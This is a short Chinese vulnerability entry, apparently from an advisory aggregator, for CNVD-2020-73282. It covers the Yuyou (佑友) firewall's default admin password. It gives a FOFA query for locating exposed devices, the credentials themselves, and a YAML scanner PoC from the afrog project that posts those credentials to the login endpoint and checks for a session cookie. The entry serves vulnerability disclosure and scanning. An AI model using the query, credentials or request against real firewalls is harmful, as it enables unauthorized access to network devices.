CNVD-2020-73282: 佑友防火墙弱口令

漏洞描述

fofa title="佑友防火墙" 佑友防火墙默认口令为admin/hicomadmin

PoC代码[已公开]

id: CNVD-2020-73282

info:
  name: 佑友防火墙弱口令
  author: 你是猪
  severity: high
  description: |
    fofa title="佑友防火墙"
    佑友防火墙默认口令为admin/hicomadmin
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2020-73282
  tags: cnvd,cnvd2020,yuyou,firewall,unauth
  created: 2020/12/15

rules:
  r1:
    request:
      method: POST
      path: /index.php?c=user&a=ajax_save
      body: username=admin&password=hicomadmin&language=zh-cn
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"success":true') && 
      response.body.bcontains(b'"message":') && 
      response.raw_header.bcontains(b'Set-Cookie')  && 
      response.raw_header.bcontains(b'FWSESSID=')
expression: r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CNVD/2020/CNVD-2020-73282.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐